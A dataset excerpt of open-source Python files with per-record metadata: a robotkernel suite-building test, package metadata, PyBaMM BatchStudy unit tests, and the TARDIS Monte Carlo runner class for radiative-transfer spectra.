from robotkernel.builders import build_suite
TEST_SUITE = """\
*** Settings ***
Library Collections
*** Keywords ***
Head
[Arguments] ${list}
${value}= Get from list ${list} 0
[Return] ${value}
*** Tasks ***
Get head
${array}= Create list 1 2 3 4 5
${head}= Head ${array}
Should be equal ${head} 1
"""
def test_string():
suite = build_suite(TEST_SUITE, {})
assert len(suite.resource.keywords) == 1
assert len(suite.tests) == 1
|
en
| 0.589127
|
# -*- coding: utf-8 -*- \ *** Settings *** Library Collections *** Keywords *** Head [Arguments] ${list} ${value}= Get from list ${list} 0 [Return] ${value} *** Tasks *** Get head ${array}= Create list 1 2 3 4 5 ${head}= Head ${array} Should be equal ${head} 1
| 2.486232
| 2
|
masterfile/_metadata.py
|
uwmadison-chm/masterfile
| 0
|
6628147
|
# -*- coding: utf-8 -*-
# flake8: noqa: E501
from __future__ import absolute_import, unicode_literals
author = '<NAME>'
email = '<EMAIL>'
version = '0.6.0'
license = 'MIT license'
copyright = 'Copyright (c) 2020 Board of Regents of the University of Wisconsin System'
url = 'https://github.com/uwmadison-chm/masterfile'
|
# -*- coding: utf-8 -*-
# flake8: noqa: E501
from __future__ import absolute_import, unicode_literals
author = '<NAME>'
email = '<EMAIL>'
version = '0.6.0'
license = 'MIT license'
copyright = 'Copyright (c) 2020 Board of Regents of the University of Wisconsin System'
url = 'https://github.com/uwmadison-chm/masterfile'
|
en
| 0.53967
|
# -*- coding: utf-8 -*- # flake8: noqa: E501
| 1.028662
| 1
|
tests/unit/test_batch_study.py
|
manjunathnilugal/PyBaMM
| 330
|
6628148
|
"""
Tests for the batch_study.py
"""
import os
import pybamm
import unittest
spm = pybamm.lithium_ion.SPM()
spm_uniform = pybamm.lithium_ion.SPM({"particle": "uniform profile"})
casadi_safe = pybamm.CasadiSolver(mode="safe")
casadi_fast = pybamm.CasadiSolver(mode="fast")
exp1 = pybamm.Experiment([("Discharge at C/5 for 10 minutes", "Rest for 1 hour")])
exp2 = pybamm.Experiment([("Discharge at C/20 for 10 minutes", "Rest for 1 hour")])
bs_false_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}
)
bs_true_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, permutations=True
)
bs_false = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp1": exp1, "exp2": exp2},
)
bs_true = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp2": exp2},
permutations=True,
)
class TestBatchStudy(unittest.TestCase):
def test_solve(self):
# Tests for exceptions
for name in pybamm.BatchStudy.INPUT_LIST:
with self.assertRaises(ValueError):
pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, **{name: {None}}
)
# Tests for None when only models are given with permutations=False
bs_false_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_false_only_models.sims))
# Tests for None when only models are given with permutations=True
bs_true_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_true_only_models.sims))
# Tests for BatchStudy when permutations=False
bs_false.solve()
bs_false.plot(testing=True)
self.assertEqual(2, len(bs_false.sims))
for num in range(len(bs_false.sims)):
output_model = bs_false.sims[num].model.name
models_list = [model.name for model in bs_false.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_false.sims[num].solver.name
solvers_list = [solver.name for solver in bs_false.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_false.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_false.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
# Tests for BatchStudy when permutations=True
bs_true.solve()
bs_true.plot(testing=True)
self.assertEqual(4, len(bs_true.sims))
for num in range(len(bs_true.sims)):
output_model = bs_true.sims[num].model.name
models_list = [model.name for model in bs_true.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_true.sims[num].solver.name
solvers_list = [solver.name for solver in bs_true.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_true.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_true.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
def test_create_gif(self):
bs = pybamm.BatchStudy({"spm": pybamm.lithium_ion.SPM()})
bs.solve([0, 10])
# create a GIF before calling the plot method
bs.create_gif(number_of_images=3, duration=1)
# create a GIF after calling the plot method
bs.plot(testing=True)
bs.create_gif(number_of_images=3, duration=1)
os.remove("plot.gif")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
"""
Tests for the batch_study.py
"""
import os
import pybamm
import unittest
spm = pybamm.lithium_ion.SPM()
spm_uniform = pybamm.lithium_ion.SPM({"particle": "uniform profile"})
casadi_safe = pybamm.CasadiSolver(mode="safe")
casadi_fast = pybamm.CasadiSolver(mode="fast")
exp1 = pybamm.Experiment([("Discharge at C/5 for 10 minutes", "Rest for 1 hour")])
exp2 = pybamm.Experiment([("Discharge at C/20 for 10 minutes", "Rest for 1 hour")])
bs_false_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}
)
bs_true_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, permutations=True
)
bs_false = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp1": exp1, "exp2": exp2},
)
bs_true = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp2": exp2},
permutations=True,
)
class TestBatchStudy(unittest.TestCase):
def test_solve(self):
# Tests for exceptions
for name in pybamm.BatchStudy.INPUT_LIST:
with self.assertRaises(ValueError):
pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, **{name: {None}}
)
# Tests for None when only models are given with permutations=False
bs_false_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_false_only_models.sims))
# Tests for None when only models are given with permutations=True
bs_true_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_true_only_models.sims))
# Tests for BatchStudy when permutations=False
bs_false.solve()
bs_false.plot(testing=True)
self.assertEqual(2, len(bs_false.sims))
for num in range(len(bs_false.sims)):
output_model = bs_false.sims[num].model.name
models_list = [model.name for model in bs_false.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_false.sims[num].solver.name
solvers_list = [solver.name for solver in bs_false.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_false.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_false.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
# Tests for BatchStudy when permutations=True
bs_true.solve()
bs_true.plot(testing=True)
self.assertEqual(4, len(bs_true.sims))
for num in range(len(bs_true.sims)):
output_model = bs_true.sims[num].model.name
models_list = [model.name for model in bs_true.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_true.sims[num].solver.name
solvers_list = [solver.name for solver in bs_true.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_true.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_true.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
def test_create_gif(self):
bs = pybamm.BatchStudy({"spm": pybamm.lithium_ion.SPM()})
bs.solve([0, 10])
# create a GIF before calling the plot method
bs.create_gif(number_of_images=3, duration=1)
# create a GIF after calling the plot method
bs.plot(testing=True)
bs.create_gif(number_of_images=3, duration=1)
os.remove("plot.gif")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
en
| 0.818742
|
Tests for the batch_study.py # Tests for exceptions # Tests for None when only models are given with permutations=False # Tests for None when only models are given with permutations=True # Tests for BatchStudy when permutations=False # Tests for BatchStudy when permutations=True # create a GIF before calling the plot method # create a GIF after calling the plot method
| 2.427339
| 2
|
tardis/montecarlo/base.py
|
nileshpatra/tardis
| 0
|
6628149
|
import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import montecarlo, packet_source
from tardis.montecarlo.formal_integral import FormalIntegrator
import numpy as np
logger = logging.getLogger(__name__)
class MontecarloRunner(HDFWriterMixin):
"""
This class is designed as an interface between the Python part and the
montecarlo C-part
"""
hdf_properties = ['output_nu', 'output_energy', 'nu_bar_estimator',
'j_estimator', 'montecarlo_virtual_luminosity',
'last_interaction_in_nu',
'last_interaction_type',
'last_line_interaction_in_id',
'last_line_interaction_out_id',
'last_line_interaction_shell_id',
'packet_luminosity', 'spectrum',
'spectrum_virtual', 'spectrum_reabsorbed']
hdf_name = 'runner'
w_estimator_constant = ((const.c ** 2 / (2 * const.h)) *
(15 / np.pi ** 4) * (const.h / const.k_B) ** 4 /
(4 * np.pi)).cgs.value
t_rad_estimator_constant = ((np.pi**4 / (15 * 24 * zeta(5, 1))) *
(const.h / const.k_B)).cgs.value
def __init__(self, seed, spectrum_frequency, virtual_spectrum_range,
sigma_thomson, enable_reflective_inner_boundary,
enable_full_relativity, inner_boundary_albedo,
line_interaction_type, integrator_settings,
v_packet_settings):
self.seed = seed
self.packet_source = packet_source.BlackBodySimpleSource(seed)
self.spectrum_frequency = spectrum_frequency
self.virtual_spectrum_range = virtual_spectrum_range
self.sigma_thomson = sigma_thomson
self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
self.inner_boundary_albedo = inner_boundary_albedo
self.enable_full_relativity = enable_full_relativity
self.line_interaction_type = line_interaction_type
self.integrator_settings = integrator_settings
self.v_packet_settings = v_packet_settings
self._integrator = None
self._spectrum_integrated = None
def _initialize_estimator_arrays(self, no_of_shells, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
model: ~Radial1DModel
"""
# Estimators
self.j_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.nu_bar_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to('cm').value
self.r_outer_cgs = model.r_outer.to('cm').value
self.v_inner_cgs = model.v_inner.to('cm/s').value
def _initialize_packets(self, T, no_of_packets):
nus, mus, energies = self.packet_source.create_packets(
T,
no_of_packets
)
self.input_nu = nus
self.input_mu = mus
self.input_energy = energies
self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
self.last_line_interaction_in_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_out_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_shell_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_type = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
self._montecarlo_virtual_luminosity = u.Quantity(
np.zeros_like(self.spectrum_frequency.value),
'erg / s'
)
@property
def spectrum(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_emitted_luminosity)
@property
def spectrum_reabsorbed(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_reabsorbed_luminosity)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0", UserWarning)
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_virtual_luminosity)
@property
def spectrum_integrated(self):
if self._spectrum_integrated is None:
self._spectrum_integrated = self.integrator.calculate_spectrum(
self.spectrum_frequency[:-1], **self.integrator_settings)
return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
def run(self, model, plasma, no_of_packets,
no_of_virtual_packets=0, nthreads=1,
last_run=False):
"""
Run the montecarlo calculation
Parameters
----------
model : tardis.model.Radial1DModel
plasma : tardis.plasma.BasePlasma
no_of_packets : int
no_of_virtual_packets : int
nthreads : int
last_run : bool
Returns
-------
None
"""
self._integrator = FormalIntegrator(
model,
plasma,
self)
self.time_of_simulation = self.calculate_time_of_simulation(model)
self.volume = model.volume
self._initialize_estimator_arrays(self.volume.shape[0],
plasma.tau_sobolevs.shape)
self._initialize_geometry_arrays(model)
self._initialize_packets(model.t_inner.value,
no_of_packets)
montecarlo.montecarlo_radial1d(
model, plasma, self,
virtual_packet_flag=no_of_virtual_packets,
nthreads=nthreads,
last_run=last_run)
# Workaround so that j_blue_estimator is in the right ordering
# They are written as an array of dimension (no_of_shells, no_of_lines)
# but python expects (no_of_lines, no_of_shells)
self.j_blue_estimator = np.ascontiguousarray(
self.j_blue_estimator.flatten().reshape(
self.j_blue_estimator.shape, order='F')
)
self.Edotlu_estimator = np.ascontiguousarray(
self.Edotlu_estimator.flatten().reshape(
self.Edotlu_estimator.shape, order='F')
)
def legacy_return(self):
return (self.output_nu, self.output_energy,
self.j_estimator, self.nu_bar_estimator,
self.last_line_interaction_in_id,
self.last_line_interaction_out_id,
self.last_interaction_type,
self.last_line_interaction_shell_id)
def get_line_interaction_id(self, line_interaction_type):
return ['scatter', 'downbranch', 'macroatom'].index(
line_interaction_type)
@property
def output_nu(self):
return u.Quantity(self._output_nu, u.Hz)
@property
def output_energy(self):
return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def packet_luminosity(self):
return self.output_energy / self.time_of_simulation
@property
def emitted_packet_mask(self):
return self.output_energy >= 0
@property
def emitted_packet_nu(self):
return self.output_nu[self.emitted_packet_mask]
@property
def reabsorbed_packet_nu(self):
return self.output_nu[~self.emitted_packet_mask]
@property
def emitted_packet_luminosity(self):
return self.packet_luminosity[self.emitted_packet_mask]
@property
def reabsorbed_packet_luminosity(self):
return -self.packet_luminosity[~self.emitted_packet_mask]
@property
def montecarlo_reabsorbed_luminosity(self):
return u.Quantity(
np.histogram(
self.reabsorbed_packet_nu,
weights=self.reabsorbed_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_emitted_luminosity(self):
return u.Quantity(
np.histogram(
self.emitted_packet_nu,
weights=self.emitted_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_virtual_luminosity(self):
return (
self._montecarlo_virtual_luminosity[:-1] /
self.time_of_simulation.value)
def calculate_emitted_luminosity(self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.emitted_packet_nu > luminosity_nu_start) &
(self.emitted_packet_nu < luminosity_nu_end))
emitted_luminosity = self.emitted_packet_luminosity[
luminosity_wavelength_filter].sum()
return emitted_luminosity
def calculate_reabsorbed_luminosity(
self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.reabsorbed_packet_nu > luminosity_nu_start) &
(self.reabsorbed_packet_nu < luminosity_nu_end))
reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
luminosity_wavelength_filter].sum()
return reabsorbed_luminosity
def calculate_radiationfield_properties(self):
"""
Calculate an updated radiation field from the :math:
`\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}`
calculated in the montecarlo simulation.
The details of the calculation can be found in the documentation.
Parameters
----------
nubar_estimator : ~np.ndarray (float)
j_estimator : ~np.ndarray (float)
Returns
-------
t_rad : ~astropy.units.Quantity (float)
w : ~numpy.ndarray (float)
"""
t_rad = (
self.t_rad_estimator_constant *
self.nu_bar_estimator /
self.j_estimator)
w = self.j_estimator / (
4 * const.sigma_sb.cgs.value * t_rad ** 4 *
self.time_of_simulation.value *
self.volume.value)
return t_rad * u.K, w
def calculate_luminosity_inner(self, model):
return (4 * np.pi * const.sigma_sb.cgs *
model.r_inner[0] ** 2 * model.t_inner ** 4).to('erg/s')
def calculate_time_of_simulation(self, model):
return (1.0 * u.erg / self.calculate_luminosity_inner(model))
def calculate_f_nu(self, frequency):
pass
def calculate_f_lambda(self, wavelength):
pass
@classmethod
def from_config(cls, config):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn('Disabling electron scattering - this is not physical')
sigma_thomson = 1e-200 * (u.cm ** 2)
else:
logger.debug("Electron scattering switched on")
sigma_thomson = const.sigma_T.cgs
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to('Hz', u.spectral()),
config.spectrum.start.to('Hz', u.spectral()),
num=config.spectrum.num + 1)
return cls(seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_range=config.montecarlo.virtual_spectrum_range,
sigma_thomson=sigma_thomson,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual)
|
import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import montecarlo, packet_source
from tardis.montecarlo.formal_integral import FormalIntegrator
import numpy as np
logger = logging.getLogger(__name__)
class MontecarloRunner(HDFWriterMixin):
"""
This class is designed as an interface between the Python part and the
montecarlo C-part
"""
hdf_properties = ['output_nu', 'output_energy', 'nu_bar_estimator',
'j_estimator', 'montecarlo_virtual_luminosity',
'last_interaction_in_nu',
'last_interaction_type',
'last_line_interaction_in_id',
'last_line_interaction_out_id',
'last_line_interaction_shell_id',
'packet_luminosity', 'spectrum',
'spectrum_virtual', 'spectrum_reabsorbed']
hdf_name = 'runner'
w_estimator_constant = ((const.c ** 2 / (2 * const.h)) *
(15 / np.pi ** 4) * (const.h / const.k_B) ** 4 /
(4 * np.pi)).cgs.value
t_rad_estimator_constant = ((np.pi**4 / (15 * 24 * zeta(5, 1))) *
(const.h / const.k_B)).cgs.value
def __init__(self, seed, spectrum_frequency, virtual_spectrum_range,
sigma_thomson, enable_reflective_inner_boundary,
enable_full_relativity, inner_boundary_albedo,
line_interaction_type, integrator_settings,
v_packet_settings):
self.seed = seed
self.packet_source = packet_source.BlackBodySimpleSource(seed)
self.spectrum_frequency = spectrum_frequency
self.virtual_spectrum_range = virtual_spectrum_range
self.sigma_thomson = sigma_thomson
self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
self.inner_boundary_albedo = inner_boundary_albedo
self.enable_full_relativity = enable_full_relativity
self.line_interaction_type = line_interaction_type
self.integrator_settings = integrator_settings
self.v_packet_settings = v_packet_settings
self._integrator = None
self._spectrum_integrated = None
def _initialize_estimator_arrays(self, no_of_shells, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
model: ~Radial1DModel
"""
# Estimators
self.j_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.nu_bar_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to('cm').value
self.r_outer_cgs = model.r_outer.to('cm').value
self.v_inner_cgs = model.v_inner.to('cm/s').value
def _initialize_packets(self, T, no_of_packets):
nus, mus, energies = self.packet_source.create_packets(
T,
no_of_packets
)
self.input_nu = nus
self.input_mu = mus
self.input_energy = energies
self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
self.last_line_interaction_in_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_out_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_shell_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_type = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
self._montecarlo_virtual_luminosity = u.Quantity(
np.zeros_like(self.spectrum_frequency.value),
'erg / s'
)
@property
def spectrum(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_emitted_luminosity)
@property
def spectrum_reabsorbed(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_reabsorbed_luminosity)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0", UserWarning)
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_virtual_luminosity)
@property
def spectrum_integrated(self):
if self._spectrum_integrated is None:
self._spectrum_integrated = self.integrator.calculate_spectrum(
self.spectrum_frequency[:-1], **self.integrator_settings)
return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
def run(self, model, plasma, no_of_packets,
no_of_virtual_packets=0, nthreads=1,
last_run=False):
"""
Run the montecarlo calculation
Parameters
----------
model : tardis.model.Radial1DModel
plasma : tardis.plasma.BasePlasma
no_of_packets : int
no_of_virtual_packets : int
nthreads : int
last_run : bool
Returns
-------
None
"""
self._integrator = FormalIntegrator(
model,
plasma,
self)
self.time_of_simulation = self.calculate_time_of_simulation(model)
self.volume = model.volume
self._initialize_estimator_arrays(self.volume.shape[0],
plasma.tau_sobolevs.shape)
self._initialize_geometry_arrays(model)
self._initialize_packets(model.t_inner.value,
no_of_packets)
montecarlo.montecarlo_radial1d(
model, plasma, self,
virtual_packet_flag=no_of_virtual_packets,
nthreads=nthreads,
last_run=last_run)
# Workaround so that j_blue_estimator is in the right ordering
# They are written as an array of dimension (no_of_shells, no_of_lines)
# but python expects (no_of_lines, no_of_shells)
self.j_blue_estimator = np.ascontiguousarray(
self.j_blue_estimator.flatten().reshape(
self.j_blue_estimator.shape, order='F')
)
self.Edotlu_estimator = np.ascontiguousarray(
self.Edotlu_estimator.flatten().reshape(
self.Edotlu_estimator.shape, order='F')
)
def legacy_return(self):
return (self.output_nu, self.output_energy,
self.j_estimator, self.nu_bar_estimator,
self.last_line_interaction_in_id,
self.last_line_interaction_out_id,
self.last_interaction_type,
self.last_line_interaction_shell_id)
def get_line_interaction_id(self, line_interaction_type):
return ['scatter', 'downbranch', 'macroatom'].index(
line_interaction_type)
@property
def output_nu(self):
return u.Quantity(self._output_nu, u.Hz)
@property
def output_energy(self):
return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def packet_luminosity(self):
return self.output_energy / self.time_of_simulation
@property
def emitted_packet_mask(self):
return self.output_energy >= 0
@property
def emitted_packet_nu(self):
return self.output_nu[self.emitted_packet_mask]
@property
def reabsorbed_packet_nu(self):
return self.output_nu[~self.emitted_packet_mask]
@property
def emitted_packet_luminosity(self):
return self.packet_luminosity[self.emitted_packet_mask]
@property
def reabsorbed_packet_luminosity(self):
return -self.packet_luminosity[~self.emitted_packet_mask]
@property
def montecarlo_reabsorbed_luminosity(self):
return u.Quantity(
np.histogram(
self.reabsorbed_packet_nu,
weights=self.reabsorbed_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_emitted_luminosity(self):
return u.Quantity(
np.histogram(
self.emitted_packet_nu,
weights=self.emitted_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_virtual_luminosity(self):
return (
self._montecarlo_virtual_luminosity[:-1] /
self.time_of_simulation.value)
def calculate_emitted_luminosity(self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.emitted_packet_nu > luminosity_nu_start) &
(self.emitted_packet_nu < luminosity_nu_end))
emitted_luminosity = self.emitted_packet_luminosity[
luminosity_wavelength_filter].sum()
return emitted_luminosity
def calculate_reabsorbed_luminosity(
self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.reabsorbed_packet_nu > luminosity_nu_start) &
(self.reabsorbed_packet_nu < luminosity_nu_end))
reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
luminosity_wavelength_filter].sum()
return reabsorbed_luminosity
def calculate_radiationfield_properties(self):
"""
Calculate an updated radiation field from the :math:
`\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}`
calculated in the montecarlo simulation.
The details of the calculation can be found in the documentation.
Parameters
----------
nubar_estimator : ~np.ndarray (float)
j_estimator : ~np.ndarray (float)
Returns
-------
t_rad : ~astropy.units.Quantity (float)
w : ~numpy.ndarray (float)
"""
t_rad = (
self.t_rad_estimator_constant *
self.nu_bar_estimator /
self.j_estimator)
w = self.j_estimator / (
4 * const.sigma_sb.cgs.value * t_rad ** 4 *
self.time_of_simulation.value *
self.volume.value)
return t_rad * u.K, w
def calculate_luminosity_inner(self, model):
return (4 * np.pi * const.sigma_sb.cgs *
model.r_inner[0] ** 2 * model.t_inner ** 4).to('erg/s')
def calculate_time_of_simulation(self, model):
return (1.0 * u.erg / self.calculate_luminosity_inner(model))
def calculate_f_nu(self, frequency):
pass
def calculate_f_lambda(self, wavelength):
pass
@classmethod
def from_config(cls, config):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn('Disabling electron scattering - this is not physical')
sigma_thomson = 1e-200 * (u.cm ** 2)
else:
logger.debug("Electron scattering switched on")
sigma_thomson = const.sigma_T.cgs
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to('Hz', u.spectral()),
config.spectrum.start.to('Hz', u.spectral()),
num=config.spectrum.num + 1)
return cls(seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_range=config.montecarlo.virtual_spectrum_range,
sigma_thomson=sigma_thomson,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual)
|
en
| 0.529193
|
This class is designed as an interface between the Python part and the montecarlo C-part Initialize the output arrays of the montecarlo simulation. Parameters ---------- model: ~Radial1DModel # Estimators Generate the cgs like geometry arrays for the montecarlo part Parameters ---------- model : model.Radial1DModel Run the montecarlo calculation Parameters ---------- model : tardis.model.Radial1DModel plasma : tardis.plasma.BasePlasma no_of_packets : int no_of_virtual_packets : int nthreads : int last_run : bool Returns ------- None # Workaround so that j_blue_estimator is in the right ordering # They are written as an array of dimension (no_of_shells, no_of_lines) # but python expects (no_of_lines, no_of_shells) Calculate an updated radiation field from the :math: `\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}` calculated in the montecarlo simulation. The details of the calculation can be found in the documentation. Parameters ---------- nubar_estimator : ~np.ndarray (float) j_estimator : ~np.ndarray (float) Returns ------- t_rad : 